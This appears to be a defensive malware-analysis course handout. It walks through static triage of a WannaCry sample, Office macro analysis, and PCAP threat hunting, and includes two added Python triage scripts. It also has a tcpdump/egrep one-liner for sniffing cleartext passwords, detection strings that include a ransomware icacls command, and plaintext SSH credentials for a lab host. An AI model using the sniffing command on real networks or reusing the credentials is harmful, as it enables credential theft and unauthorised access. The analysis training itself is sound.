Advanced Malware Analysis 2020


#####################################################
# Advanced Malware Analysis 2020 #
# By Joe McCray #
#####################################################

- Here is a good set of slides for getting started with Linux:
http://www.slideshare.net/olafusimichael/linux-training-24086319

- Here is a good tutorial that you should complete before doing the labs below:
http://linuxsurvival.com/linux-tutorial-introduction/

- I prefer to use PuTTY to SSH into my Linux host.

- You can download PuTTY from here:
http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe

Here is the information to put into PuTTY:

Host Name: 155.138.209.44
protocol: ssh
port: 22
username: ama
password: ama-secureninja!

Indicators of Compromise (IoC)
-----------------------------

1. Modify the filesystem
2. Modify the registry - ADVAPI32.dll (persistence)
3. Modify processes/services
4. Connect to the network - WS2_32.dll

if you can't detect a registry change across 5% of your network

EDR Solution
------------

1. Static Analysis <----------------------------------------- Cloud based static analysis
Learn everything I can without actually running the file
- Modify FS - File integrity checker
- Modify registry
- Modify processes/services
- Connect to the network

2. Dynamic Analysis
Runs the file in a VM/Sandbox

################
# The Scenario #
################
You've come across a file that has been flagged by one of your security products
(AV Quarantine, HIPS, Spam Filter, Web Proxy, or digital forensics scripts).

The fastest thing you can do is perform static analysis.

###################
# Static Analysis #
###################

---------------------------Type This-----------------------------------

cd ~/static_analysis

file wannacry.exe

cp wannacry.exe malware.pdf

file malware.pdf

hexdump -n 2 -C wannacry.exe

----------------------------------------------------------------------

***What is '4d 5a' or 'MZ'***


-------------------------Paste this URL into Firefox-----------------------------------
http://www.garykessler.net/library/file_sigs.html
---------------------------------------------------------------------------------------

---------------------------Type This-----------------------------------
cd ~/static_analysis

objdump -x wannacry.exe

objdump -x wannacry.exe | less

q

strings wannacry.exe

strings wannacry.exe | grep -i dll

strings wannacry.exe | grep -i library

strings wannacry.exe | grep -i reg

strings wannacry.exe | grep -i key

strings wannacry.exe | grep -i rsa

strings wannacry.exe | grep -i open

strings wannacry.exe | grep -i get

strings wannacry.exe | grep -i mutex

strings wannacry.exe | grep -i irc

strings wannacry.exe | grep -i join

strings wannacry.exe | grep -i admin

strings wannacry.exe | grep -i list

----------------------------------------------------------------------

Hmmmmm.......what's the latest thing in the news - oh yeah "WannaCry"

Quick Google search for "wannacry ransomware analysis"

Reference
https://securingtomorrow.mcafee.com/executive-perspectives/analysis-wannacry-ransomware-outbreak/

- Yara Rule -

rule WannaCry_strings
{
    // Rule header and condition added here so the strings section from the
    // reference loads as a complete rule; the reference excerpt lists only
    // the strings, so "any of them" is an assumed condition.
    strings:
        $s1 = "Ooops, your files have been encrypted!" wide ascii nocase
        $s2 = "Wanna Decryptor" wide ascii nocase
        $s3 = ".wcry" wide ascii nocase
        $s4 = "WANNACRY" wide ascii nocase
        $s5 = "WANACRY!" wide ascii nocase
        $s7 = "icacls . /grant Everyone:F /T /C /Q" wide ascii nocase
    condition:
        any of them
}

Ok, let's look for the individual strings

---------------------------Type This-----------------------------------
cd ~/static_analysis

strings wannacry.exe | grep -i ooops

strings wannacry.exe | grep -i wanna

strings wannacry.exe | grep -i wcry

strings wannacry.exe | grep -i wannacry

strings wannacry.exe | grep -i wanacry **** Matches $s5, hmmm.....

----------------------------------------------------------------------

####################################
# Tired of GREP - let's try Python #
####################################
I decided to write my own script for this kind of work. It is a good script for
the basics of static analysis.

Reference:
https://joesecurity.org/reports/report-db349b97c37d22f5ea1d1841e3c89eb4.html

This is really good for showing some good signatures to add to the Python script

---------------------------Type This-----------------------------------
cd ~/static_analysis

nano am.py

python3 am.py wannacry.exe
----------------------------------------------------------------------

#####################################################
# Analyzing Macro Embedded Malware #
#####################################################
---------------------------Type This-----------------------------------
cd ~/static_analysis/oledump

python oledump.py 064016.doc

python oledump.py 064016.doc -s A4 -v


-----------------------------------------------------------------------

- From this we can see this Word doc contains an embedded file called editdata.mso
which contains seven data streams.
- Three of the data streams are flagged as macros: A3:'VBA/Module1',
A4:'VBA/Module2', A5:'VBA/ThisDocument'.

---------------------------Type This-----------------------------------
python oledump.py 064016.doc -s A5 -v
-----------------------------------------------------------------------

- As far as I can tell, VBA/Module2 does absolutely nothing. These are nonsensical
functions designed to confuse heuristic scanners.
---------------------------Type This-----------------------------------
python oledump.py 064016.doc -s A3 -v
-----------------------------------------------------------------------

- Look for "GVhkjbjv" and you should see:


- Take that long blob that starts with 636D and finishes with 653B and paste it in:
http://www.rapidtables.com/convert/number/hex-to-ascii.htm

#########################################
# Security Operations Center Job Roles #
# Intrusion Analysis Level 1 #
#########################################
Required Technical Skills: Comfortable with basic Linux/Windows (MCSA/Linux+)
                           Comfortable with basic network (Network+)
                           Comfortable with security fundamentals (Security+)

Job Task: Process security events, follow incident response triage playbook

#########################################
# Security Operations Center Job Roles #
# Intrusion Analysis Level 2 #
#########################################

Required Technical Skills: Comfortable with basic Linux/Windows system administration
                           Comfortable with basic network administration
                           Comfortable with basic programming
                           Comfortable researching IT security issues

Job Task: Perform detailed malware analysis, assist with development of the incident
          response triage playbook

#########################################
# Security Operations Center Job Roles #
# Intrusion Analysis Level 3 #
#########################################

Required Technical Skills: Strong statistical analysis background
                           Strong programming background (C, C++, Java, Assembly,
                           scripting languages)
                           Advanced system/network administration background
                           Comfortable researching IT security issues

Job Task: Perform detailed malware analysis
          Perform detailed statistical analysis
          Assist with development of the incident response triage playbook

-----------------------------------------------------------------------------------
#######################
# Passive Recon #
# aka: OSINT #
# aka: Footprinting #
#######################

- Wikipedia Page
- Are they Public or Private?
- Does the target have any subsidiaries?
- Have they had any scandals?

- Robtex
- Show system map

- Sample OSINT Report:
https://infosecaddicts-files.s3.amazonaws.com/OSINT_Innophos.doc

- Misc
OSINT on a hacker group:
https://en.wikipedia.org/wiki/Anonymous_(group)
https://en.wikipedia.org/wiki/LulzSec

OSINT on a terrorist group:
https://en.wikipedia.org/wiki/Al-Qaeda
https://en.wikipedia.org/wiki/Taliban
https://en.wikipedia.org/wiki/Islamic_State_of_Iraq_and_the_Levant

Step 1: Receive suspicious file
-------------------------------
- Help Desk tickets
- SIEM
- AV
- EDR
- Email/Spam
- Proxy

Step 2: Perform static analysis
-------------------------------
1. Run strings/grep for primary IoCs
- Modifies the registry
- Modifies processes/services
- Modifies the filesystem
- Connects to the network

A yes to these should help you determine whether you want to do dynamic
analysis or not

Consideration 1: Encryption/Obfuscation - you may have to do dynamic analysis

Consideration 2: If you are dealing with anti-analysis techniques - you may have to
do static analysis

Step 3: Determine if the malware modifies the registry
------------------------------------------------------
strings wannacry.exe | grep -i reg

strings wannacry.exe | grep -iE 'HKEY_CURRENT_USER|HKEY_CLASSES_ROOT|HKEY_LOCAL_MACHINE|HKCU|HKLM|RegCloseKey|HKEY_CURRENT_CONFIG|HKEY_USERS'

strings wannacry.exe | grep -i hkcu

strings wannacry.exe | grep -i hklm

strings wannacry.exe | grep -i hkcr

Step 4: Determine if the malware modifies processes/services
------------------------------------------------------------
strings wannacry.exe | grep -i advapi32

strings wannacry.exe | grep -i service

strings wannacry.exe | grep -i OpenSCManagerA

strings wannacry.exe | grep -i InternetCloseHandle

strings wannacry.exe | grep -i OpenServiceA

strings wannacry.exe | grep -i CloseServiceHandle

strings wannacry.exe | grep -i StartServiceCtrlDispatcherA

strings wannacry.exe | grep -i GetExitCodeProcess

strings wannacry.exe | grep -i GetProcAddress

Step 4: Determine if the malware modifies the file system
------------------------------------------------------------
strings wannacry.exe | grep -i GetTempPathW

strings wannacry.exe | grep -i GetWindowsDirectoryW

strings wannacry.exe | grep -i %TEMP%

strings wannacry.exe | grep -i GetFileAttributesA

Step 5: Does the malware have any persistence capability
--------------------------------------------------------
3 main ways for an attacker to maintain access to a compromised system
(persistence)

- Registry
- Service
- Scheduled task
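Here is a stripped-down version of the kind of script am.py stands for, written as an added example for this handout (it is not the course's am.py). It pulls ASCII and UTF-16LE strings out of a file the way strings does, then buckets them into the signature classes from Steps 3 to 5 (registry, processes/services, filesystem, network, persistence). The signature lists are illustrative and the sample bytes are constructed, not a real executable.

```python
#!/usr/bin/env python3
"""String-based IoC triage for a suspicious file (added example, not the course's am.py)."""
import re
import sys

# Signature classes from Steps 3-5 of the handout. The API names are real Win32
# imports; the lists are illustrative and deliberately short.
SIGNATURES = {
    "registry": ["HKEY_CURRENT_USER", "HKEY_CLASSES_ROOT", "HKEY_LOCAL_MACHINE",
                 "HKEY_CURRENT_CONFIG", "HKEY_USERS", "HKCU", "HKLM", "HKCR",
                 "RegCloseKey", "RegSetValueEx", "RegCreateKeyEx"],
    "process_service": ["ADVAPI32.dll", "OpenSCManagerA", "OpenServiceA",
                        "CloseServiceHandle", "StartServiceCtrlDispatcherA",
                        "GetExitCodeProcess", "GetProcAddress", "CreateProcess"],
    "filesystem": ["GetTempPathW", "GetWindowsDirectoryW", "%TEMP%",
                   "GetFileAttributesA", "CreateFileA", "WriteFile"],
    "network": ["WS2_32.dll", "InternetOpenA", "InternetCloseHandle",
                "WSAStartup", "gethostbyname", "WinHttp"],
    # Step 5: registry run keys, services and scheduled tasks
    "persistence": ["CurrentVersion\\Run", "CreateServiceA", "schtasks"],
}

# Same idea as `strings` (ASCII) and `strings -el` (UTF-16LE), minimum length 4
ASCII_RE = re.compile(rb"[\x20-\x7e]{4,}")
WIDE_RE = re.compile(rb"(?:[\x20-\x7e]\x00){4,}")


def extract_strings(data: bytes):
    """Return printable ASCII and UTF-16LE strings found in the raw bytes."""
    found = [m.group().decode("ascii") for m in ASCII_RE.finditer(data)]
    found += [m.group().decode("utf-16le") for m in WIDE_RE.finditer(data)]
    return found


def classify(strings):
    """Map each signature class to the strings that hit it (case-insensitive substring)."""
    hits = {cls: set() for cls in SIGNATURES}
    for s in strings:
        low = s.lower()
        for cls, sigs in SIGNATURES.items():
            if any(sig.lower() in low for sig in sigs):
                hits[cls].add(s)
    return {cls: sorted(v) for cls, v in hits.items()}


def triage(data: bytes):
    """Full pass: strings -> classified hits. Empty lists mean no static evidence."""
    return classify(extract_strings(data))


# Constructed stand-in for a PE: an MZ header fragment, a few import names and
# one UTF-16LE registry path. Not real malware. The double null before the wide
# string keeps the ASCII run from bleeding into the UTF-16 match.
SAMPLE = (
    b"MZ\x90\x00" + b"\x00" * 8
    + b"ADVAPI32.dll\x00RegCreateKeyExA\x00OpenSCManagerA\x00"
    + b"WS2_32.dll\x00GetTempPathW\x00\x00"
    + "Software\\Microsoft\\Windows\\CurrentVersion\\Run".encode("utf-16le")
    + b"\x00\x00"
)


def main(argv):
    # With a path argument, triage that file; otherwise run on the constructed sample.
    data = open(argv[1], "rb").read() if len(argv) > 1 else SAMPLE
    for cls, matches in triage(data).items():
        print(f"[{'+' if matches else '-'}] {cls}: {', '.join(matches) or 'no hits'}")


if __name__ == "__main__":
    main(sys.argv)
```

A hit in the persistence or network bucket is the "yes" from Step 2 that argues for running the sample dynamically as well.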

##############
# Class task #
##############

Task 1: Go to https://joesecurity.org/joe-sandbox-reports

Identify 5 reports for malware that are similar to what you've seen or been
concerned about in your environment

1. Maze
2. Bad rabbit
3. Trojanized Adobe Installer
4. Emotet
5. bitcoin miner

Task 2: What do you want to be able to find

What did you see in each of these reports that you found interesting and would like
to be able to look for in your investigations?

Task 3: Identify the unique strings that you would like to search for
1.
2.
3.

Task 4: Unique classes of attack

Identify the unique classes of signatures that interest us the most that are NOT in
my am.py file list
1. Trickier http request methods
2. Dynamic libraries/API calls
3. Lateral movement

Task 5: Identify limitations of the script

1. Only analyzes exes
2. Too many functions and no classes
3. Not modular enough
4. Signature list is not very thorough
5. Doesn't save to db

---------------------------Type This-----------------------------------
cd /home/ama/malware_samples/office-doc_files

file sample1.doc

olevba sample1.doc

python /home/ama/static_analysis/oledump/oledump.py sample1.doc
----------------------------------------------------------------------

What is oledump.py?
===================

Reference: https://blog.didierstevens.com/programs/oledump-py/

oledump.py is a program to analyze OLE files (Compound File Binary Format). These
files contain streams of data. oledump allows you to analyze these streams.

Many applications use this file format, the best known is MS Office. .doc, .xls,
.ppt, … are OLE files (docx, xlsx, … is the new file format: XML inside ZIP).

What is olevba?
===============

Reference: https://github.com/decalage2/oletools/wiki/olevba

olevba is a script to parse OLE and OpenXML files such as MS Office documents (e.g.
Word, Excel), to detect VBA Macros, extract their source code in clear text, and
detect security-related patterns such as auto-executable macros, suspicious VBA
keywords used by malware, anti-sandboxing and anti-virtualization techniques, and
potential IOCs (IP addresses, URLs, executable filenames, etc). It also detects and
decodes several common obfuscation methods including Hex encoding, StrReverse,
Base64, Dridex, VBA expressions, and extracts IOCs from decoded strings. XLM/Excel
4 Macros are also supported in Excel and SLK files.

It can be used either as a command-line tool, or as a python module from your own
applications.

It is part of the python-oletools package.

Now let's dig in with oledump

---------------------------Type This-----------------------------------
python /home/ama/static_analysis/oledump/oledump.py sample1.doc -s A7 -v

python /home/ama/static_analysis/oledump/oledump.py sample1.doc -s A8 -v

python /home/ama/static_analysis/oledump/oledump.py sample1.doc -s A9 -v
----------------------------------------------------------------------

Now let's dig in with olevba

---------------------------Type This-----------------------------------
olevba sample1.doc --decode

olevba sample1.doc --deobf
----------------------------------------------------------------------

#############
# EXE Files #
#############

OK, let's take a look at exe files

---------------------------Type This-----------------------------------
cd /home/ama/malware_samples/exe_files

objdump -x sample1.exe

objdump -x sample1.exe | less

q

strings sample1.exe

strings sample1.exe | grep -i dll

strings sample1.exe | grep -i library

strings sample1.exe | grep -i reg

strings sample1.exe | grep -i key

strings sample1.exe | grep -i rsa

strings sample1.exe | grep -i open

strings sample1.exe | grep -i get

strings sample1.exe | grep -i mutex

strings sample1.exe | grep -i irc

strings sample1.exe | grep -i join

strings sample1.exe | grep -i admin

strings sample1.exe | grep -i list

python3 ~/am.py sample1.exe
----------------------------------------------------------------------

Let's play with another tool called pyew.

Reference: https://github.com/joxeankoret/pyew

Pyew is a tool like radare or biew/hiew. It's a hexadecimal viewer and disassembler
for IA32 and AMD64 with support for PE & ELF formats, as well as other non-executable
formats like OLE2 or PDF.

---------------------------Type This-----------------------------------
pyew sample1.exe

[0x00000000]> ?

[0x00000000]> md5

[0x00000000]> sha256

[0x00000000]> url

[0x00000000]> chkurl
----------------------------------------------------------------------

Since this is a PE file, let's do some stuff that's specific for exe files

Here are the commands again:

Commands:

?/help          Show this help
x/dump/hexdump  Show hexadecimal dump
s/seek          Seek to a new offset
g/G             Goto BOF (g) or EOF (G)
+/-             Go forward/backward one block (specified by pyew.bsize)
c/d/dis/pd      Show disassembly
r/repr          Show string represantation
p               Print the buffer
/x expr         Search hexadecimal string
/s expr         Search strings
/i expr         Search string ignoring case
/r expr         Search regular expression
/u expr         Search unicode expression
/U expr         Search unicode expression ignoring case

Now, let's see the disassembly at the entry point so, seek to the entry point:
---------------------------Type This-----------------------------------
[0x00000000]> s ep
-----------------------------------------------------------------------

And disassemble it with the command "c" (you may also use "d", "dis" or "pd"):
---------------------------Type This-----------------------------------
[0x00025ce0:0x00426ae0]> c
-----------------------------------------------------------------------

To see the code at the function's position, just type the number assigned to the
function (the number after the ";" character):
---------------------------Type This-----------------------------------
[0x00025ce0:0x00426ae0]> 1
[0x00025d07:0x00426b07]> 2
-----------------------------------------------------------------------

OK, we're done analyzing this function. To go back to the prior point (the entry
point in our case) we can type "b" to go back:
---------------------------Type This-----------------------------------
[0x00025d07:0x00426b07]> b
-----------------------------------------------------------------------

To continue seeing more disassembly, just press the enter key to see the next
block's disassembly (BTW, if the last command was "x" to show the hexadecimal dump,
pressing enter would show the next block's hexadecimal dump):

To list the functions detected by Pyew type "pyew.names":
---------------------------Type This-----------------------------------
[0x00025cfe:0x00426afe]> pyew.names
-----------------------------------------------------------------------

Let's see if it was packed
---------------------------Type This-----------------------------------
[0x00025ce0:0x00426ae0]> packer
-----------------------------------------------------------------------

Let's see if it uses any anti-virtual-machine tricks
---------------------------Type This-----------------------------------
[0x00025ce0:0x00426ae0]> antivm
-----------------------------------------------------------------------

#########################
# Playing with packets #
#########################

####################
# Intro to TCPDump #
####################
---------------------------Type This-----------------------------------
sudo apt-get install -y tcpdump lynx
-----------------------------------------------------------------------

Basic sniffing
--------------
---------------------------Type This-----------------------------------
sudo tcpdump -n
-----------------------------------------------------------------------

Now let's increase the display resolution of this packet, or get more details about
it. The verbose switch comes in handy.
---------------------------Type This-----------------------------------
sudo tcpdump -v -n
-----------------------------------------------------------------------

Getting the ethernet header (link layer headers)
------------------------------------------------
In the above examples details of the ethernet header are not printed. Use the -e
option to print the ethernet header details as well.
---------------------------Type This-----------------------------------
sudo tcpdump -vv -n -e
------------------------------------------------------------------------

Sniffing a particular interface
-------------------------------
In order to sniff a particular network interface we must specify it with the -i
switch. First let's get the list of available interfaces using the -D switch.
---------------------------Type This-----------------------------------
sudo tcpdump -D
------------------------------------------------------------------------

Filtering packets using expressions - Selecting protocols
---------------------------------------------------------
---------------------------Type This-----------------------------------
$ sudo tcpdump -n tcp
------------------------------------------------------------------------
Particular host or port
-----------------------
Expressions can be used to specify source ip, destination ip, and port numbers. The
next example picks up all those packets with source address 192.168.1.101
---------------------------Type This-----------------------------------
$ sudo tcpdump -n 'src 192.168.1.101'
------------------------------------------------------------------------

The next example picks up DNS request packets, i.e. those packets which originate
from the local machine and go to port 53 of some other machine.
---------------------------Type This-----------------------------------
$ sudo tcpdump -n 'udp and dst port 53'
------------------------------------------------------------------------

To display the FTP packets coming from 192.168.1.100 to 192.168.1.2
---------------------------Type This-----------------------------------
$ sudo tcpdump 'src 192.168.1.100 and dst 192.168.1.2 and port ftp'
------------------------------------------------------------------------

Search the network traffic using grep

Grep can be used along with tcpdump to search the network traffic. Here is a very
simple example
---------------------------Type This-----------------------------------
$ sudo tcpdump -n -A | grep -e 'POST'
------------------------------------------------------------------------

So what is the idea behind searching packets? Well, one good thing can be to sniff
passwords.
Here is a quick example to sniff passwords using egrep:

---------------------------Type This-----------------------------------
tcpdump port http or port ftp or port smtp or port imap or port pop3 -l -A | egrep -i 'pass=|pwd=|log=|login=|user=|username=|pw=|passw=|passwd=|password=|pass:|user:|username:|password:|login:|pass |user ' --color=auto --line-buffered -B20
------------------------------------------------------------------------

#########
# NGrep #
#########

Install ngrep on Ubuntu
---------------------------Type This-----------------------------------
$ sudo apt-get install ngrep
------------------------------------------------------------------------

Search network traffic for string "User-Agent: "
---------------------------Type This-----------------------------------
$ sudo ngrep -d ens3 "User-Agent: " tcp and port 80
------------------------------------------------------------------------
In the above command:
a) tcp and port 80 - is the BPF filter (Berkeley Packet Filter), which sniffs only
TCP packets with port number 80
b) The -d option specifies the interface to sniff, ens3 in this case.
c) "User-Agent: " is the string to search for. All packets that have that string
are displayed.

2. Search network packets for GET or POST requests:
---------------------------Type This-----------------------------------
$ sudo ngrep -l -q -d ens3 "^GET |^POST " tcp and port 80
------------------------------------------------------------------------
The -l option makes stdout line buffered and the -q option is for quiet (be quiet;
don't output any information other than packet headers and their payloads, if
relevant).

3. ngrep without any options would simply capture all packets.
---------------------------Type This-----------------------------------
$ sudo ngrep
------------------------------------------------------------------------

Reference:
https://dl.packetstormsecurity.net/papers/general/ngreptut.txt
---------------------------Type This-----------------------------------
$ sudo ngrep -d ens3 -n 3

$ sudo ngrep -d any port 25
------------------------------------------------------------------------

This will let you monitor all activity crossing source or destination port 25
(SMTP).
---------------------------Type This-----------------------------------
$ sudo ngrep -wi -d wlan0 'user|pass' port 6667

$ sudo ngrep -wi -d any 'user|pass' port 21
------------------------------------------------------------------------

###############################
# Threat Hunting on the wire #
###############################

##################################################################
# Analyzing a PCAP Prads #
# Note: run as regular user #
##################################################################

---------------------------Type this as a regular user----------------------------------
cd ~

mkdir pcap_analysis/

cd ~/pcap_analysis/

mkdir prads

cd ~/pcap_analysis/prads

wget http://45.63.104.73/suspicious-time.pcap
prads -r suspicious-time.pcap -l prads-asset.log

cat prads-asset.log | less

cat prads-asset.log | grep SYN | grep -iE 'windows|linux'

cat prads-asset.log | grep CLIENT | grep -iE 'safari|firefox|opera|chrome'

cat prads-asset.log | grep SERVER | grep -iE 'apache|linux|ubuntu|nginx|iis'


-----------------------------------------------------------------------

##################################
# PCAP Analysis with ChaosReader #
# Note: run as regular user #
##################################
---------------------------Type this as a regular user----------------------------------
cd ~

mkdir -p pcap_analysis/chaos_reader/

cd ~/pcap_analysis/chaos_reader/

wget http://45.63.104.73/suspicious-time.pcap

wget http://45.63.104.73/chaosreader.pl

perl chaosreader.pl suspicious-time.pcap

cat index.text | grep -v '"' | grep -oE "([0-9]+\.){3}[0-9]+.*\)"

cat index.text | grep -v '"' | grep -oE "([0-9]+\.){3}[0-9]+.*\)" | awk '{print $4, $5, $6}' | sort | uniq -c | sort -nr

for i in session_00[0-9]*.http.html; do srcip=`cat "$i" | grep 'http:\ ' | awk '{print $2}' | cut -d ':' -f1`; dstip=`cat "$i" | grep 'http:\ ' | awk '{print $4}' | cut -d ':' -f1`; host=`cat "$i" | grep 'Host:\ ' | sort -u | sed -e 's/Host:\ //g'`; echo "$srcip --> $dstip = $host"; done | sort -u

for i in session_00[0-9]*.http.html; do srcip=`cat "$i" | grep 'http:\ ' | awk '{print $2}' | cut -d ':' -f1`; dstip=`cat "$i" | grep 'http:\ ' | awk '{print $4}' | cut -d ':' -f1`; host=`cat "$i" | grep 'Host:\ ' | sort -u | sed -e 's/Host:\ //g'`; echo "$srcip --> $dstip = $host"; done | sort -u | awk '{print $5}' > url.lst

wget https://raw.githubusercontent.com/Open-Sec/forensics-scripts/master/check-urls-virustotal.py

python check-urls-virustotal.py url.lst

python -m SimpleHTTPServer
****** Open a web browser and browse to the IP address of your Linux
machine on port 8000 for the web page *****

------------------------------------------------------------------------

#############################
# PCAP Analysis with tshark #
# Note: run as regular user #
#############################
---------------------------Type this as a regular user---------------------------------
cd ~/pcap_analysis/

mkdir tshark

cd ~/pcap_analysis/tshark

wget http://45.63.104.73/suspicious-time.pcap

tshark -i ens3 -r suspicious-time.pcap -qz io,phs

tshark -r suspicious-time.pcap -qz ip_hosts,tree

tshark -r suspicious-time.pcap -Y "http.request" -Tfields -e "ip.src" -e "http.user_agent" | uniq

tshark -r suspicious-time.pcap -Y "dns" -T fields -e "ip.src" -e "dns.flags.response" -e "dns.qry.name"

tshark -r suspicious-time.pcap -Y http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}'

whois rapidshare.com.eyu32.ru

whois sploitme.com.cn

tshark -r suspicious-time.pcap -Y http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}' | grep -v -e '\/image' -e '.css' -e '.ico' -e google -e 'honeynet.org'

tshark -r suspicious-time.pcap -qz http_req,tree

tshark -r suspicious-time.pcap -Y "data-text-lines contains \"<script\"" -T fields -e frame.number -e ip.src -e ip.dst

tshark -r suspicious-time.pcap -Y http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}' | grep -v -e '\/image' -e '.css' -e '.ico' | grep 10.0.3.15 | sed -e 's/\?[^cse].*/\?\.\.\./g'
------------------------------------------------------------------------
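The tshark/awk/grep pipeline above can be reproduced without Wireshark installed. The following is an added example written for this handout, not a course script: it walks a classic pcap record by record, parses the Ethernet/IPv4/TCP headers itself, pulls ip.src, ip.dst, http.host and http.request.uri out of each request segment, and applies the same grep -v filter for images, css and ico. The capture it runs on is constructed inline (10.0.3.15 is the victim address from the handout; the server 192.0.2.10 and host shop.example are placeholders).

```python
#!/usr/bin/env python3
"""Pull HTTP requests out of a pcap without tshark (added example, constructed data)."""
import re
import socket
import struct

LINKTYPE_ETHERNET = 1
ETHERTYPE_IPV4 = 0x0800
IPPROTO_TCP = 6
REQ_RE = re.compile(rb"^(GET|POST|HEAD) (\S+) HTTP/1\.[01]\r\n")
HOST_RE = re.compile(rb"\r\nHost: ([^\r\n]+)")
STATIC = ("/image", ".css", ".ico")   # the handout's grep -v list


def iter_packets(pcap: bytes):
    """Yield raw link-layer frames from a classic (non-pcapng) pcap file."""
    magic, = struct.unpack_from("<I", pcap, 0)
    if magic == 0xA1B2C3D4:
        endian = "<"
    elif magic == 0xD4C3B2A1:
        endian = ">"
    else:
        raise ValueError("not a classic pcap file")
    linktype, = struct.unpack_from(endian + "I", pcap, 20)
    if linktype != LINKTYPE_ETHERNET:
        raise ValueError("only Ethernet captures are handled here")
    off = 24
    while off + 16 <= len(pcap):
        _sec, _usec, incl_len, _orig_len = struct.unpack_from(endian + "IIII", pcap, off)
        off += 16
        yield pcap[off:off + incl_len]
        off += incl_len


def http_requests(pcap: bytes):
    """Yield (ip.src, ip.dst, http.host, http.request.uri) per request segment.

    Same fields as the tshark -Y http.request -T fields line. No TCP reassembly:
    a request line split across segments is missed here but caught by tshark.
    """
    for frame in iter_packets(pcap):
        if len(frame) < 34 or struct.unpack_from("!H", frame, 12)[0] != ETHERTYPE_IPV4:
            continue
        ihl = (frame[14] & 0x0F) * 4          # IPv4 header length from the IHL nibble
        if frame[23] != IPPROTO_TCP:
            continue
        src, dst = socket.inet_ntoa(frame[26:30]), socket.inet_ntoa(frame[30:34])
        tcp = 14 + ihl
        doff = (frame[tcp + 12] >> 4) * 4     # TCP data offset, skips any options
        payload = frame[tcp + doff:]
        m = REQ_RE.match(payload)
        if not m:
            continue
        h = HOST_RE.search(payload)
        host = h.group(1).decode("latin-1") if h else dst
        yield src, dst, host, m.group(2).decode("latin-1")


def interesting_requests(pcap: bytes, skip=STATIC):
    """Format like the awk line and drop images/css/ico like the grep -v step."""
    return [(s, d, f"http://{h}{u}") for s, d, h, u in http_requests(pcap)
            if not any(x in u for x in skip)]


def build_pcap(packets):
    """Write a minimal pcap with one TCP segment per (src, dst, payload).
    Constructed test data: dummy MACs, zeroed checksums (not verified above)."""
    out = [struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, LINKTYPE_ETHERNET)]
    for src, dst, payload in packets:
        eth = b"\xaa" * 6 + b"\xbb" * 6 + struct.pack("!H", ETHERTYPE_IPV4)
        ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40 + len(payload), 1, 0, 64,
                         IPPROTO_TCP, 0, socket.inet_aton(src), socket.inet_aton(dst))
        tcp = struct.pack("!HHIIBBHHH", 49152, 80, 1, 1, 5 << 4, 0x18, 8192, 0, 0)
        frame = eth + ip + tcp + payload
        out.append(struct.pack("<IIII", 0, 0, len(frame), len(frame)) + frame)
    return b"".join(out)


# Constructed capture: two requests from the handout's victim address plus one
# server reply, which must not be reported as a request.
SAMPLE_PCAP = build_pcap([
    ("10.0.3.15", "192.0.2.10",
     b"GET /shop/index.php?id=1 HTTP/1.1\r\nHost: shop.example\r\n"
     b"User-Agent: Mozilla/4.0\r\n\r\n"),
    ("10.0.3.15", "192.0.2.10",
     b"GET /image/logo.png HTTP/1.1\r\nHost: shop.example\r\n\r\n"),
    ("192.0.2.10", "10.0.3.15",
     b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n<html></html>"),
])

if __name__ == "__main__":
    for src, dst, url in interesting_requests(SAMPLE_PCAP):
        print(f"{src} -> {dst}\t: {url}")
```

To run it over suspicious-time.pcap, pass open("suspicious-time.pcap", "rb").read() to interesting_requests().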

###############################
# Extracting files from PCAPs #
# Note: run as regular user #
###############################
---------------------------Type this as a regular user---------------------------------
sudo apt install -y foremost

cd ~/pcap_analysis/

mkdir extract_files

cd extract_files

wget http://45.63.104.73/suspicious-time.pcap

foremost -v -i suspicious-time.pcap

cd output

ls

cat audit.txt

cd exe

wget https://raw.githubusercontent.com/GREEKYnikhilsharma/Xen0ph0n-VirusTotal_API_Tool-Python3/master/vtlite.py

******* NOTE: You will need to put your virustotal API key in vtlite.py *******

for f in *.exe; do python3 vtlite.py -s $f; done


-----------------------------------------------------------------------------------

###################################
# Setting up Suricata #
# Note: run as root user #
###################################

Here is where we will setup all of the required dependencies for the tools we plan
to install
---------------------------Type this as root--------------------------
apt update
apt-get install -y libpcre3-dbg libpcre3-dev autoconf automake libtool libpcap-dev \
  libnet1-dev libyaml-dev libjansson4 libcap-ng-dev libmagic-dev libjansson-dev \
  zlib1g-dev libnetfilter-queue-dev libnetfilter-queue1 libnfnetlink-dev cmake make \
  gcc g++ flex bison libpcap-dev libssl-dev unzip python-dev swig zlib1g-dev sendmail \
  sendmail-bin prads tcpflow python-scapy python-yara tshark whois jq prads foremost \
  python3-dnspython
-----------------------------------------------------------------------
Now we install Suricata
---------------------------Type this as root-------------------------------
cd /root/

wget https://www.openinfosecfoundation.org/download/suricata-4.0.5.tar.gz

tar -zxvf suricata-4.0.5.tar.gz

cd suricata-4.0.5

./configure --enable-nfqueue --prefix=/usr --sysconfdir=/etc --localstatedir=/var

make

make install

make install-conf

cd rules

cp *.rules /etc/suricata/rules/

cd /etc/suricata/

wget https://rules.emergingthreats.net/open/suricata-4.0/emerging.rules.tar.gz

tar -zxvf emerging.rules.tar.gz


-----------------------------------------------------------------------

###############################
# PCAP Analysis with Suricata #
# Note: run as root #
###############################
--------------------------Type this as root--------------------------------
cd ~

mkdir suricata/

cd suricata/

wget http://45.63.104.73/suspicious-time.pcap

sudo suricata -c /etc/suricata/suricata.yaml -r suspicious-time.pcap -l suri/

cd suri/

cat stats.log | less

cat eve.json |grep -E "e\":\"http"|jq ".timestamp,.http"|csplit - /..T..:/ {*}

cat xx01

cat xx02
cat xx03

cat xx04

cat xx05

cat xx06
------------------------------------------------------------------------

#############################
# PCAP Analysis with Yara #
# Note: run as regular user #
#############################
-------------------------Type this as a regular user----------------------------------
cd ~/pcap_analysis/

git clone https://github.com/kevthehermit/YaraPcap.git

cd YaraPcap/

wget http://45.63.104.73/suspicious-time.pcap

wget https://github.com/Yara-Rules/rules/archive/master.zip

unzip master.zip

cd rules-master/

ls

cat index.yar

clear

./index_gen.sh

cd ..

mkdir matching_files/

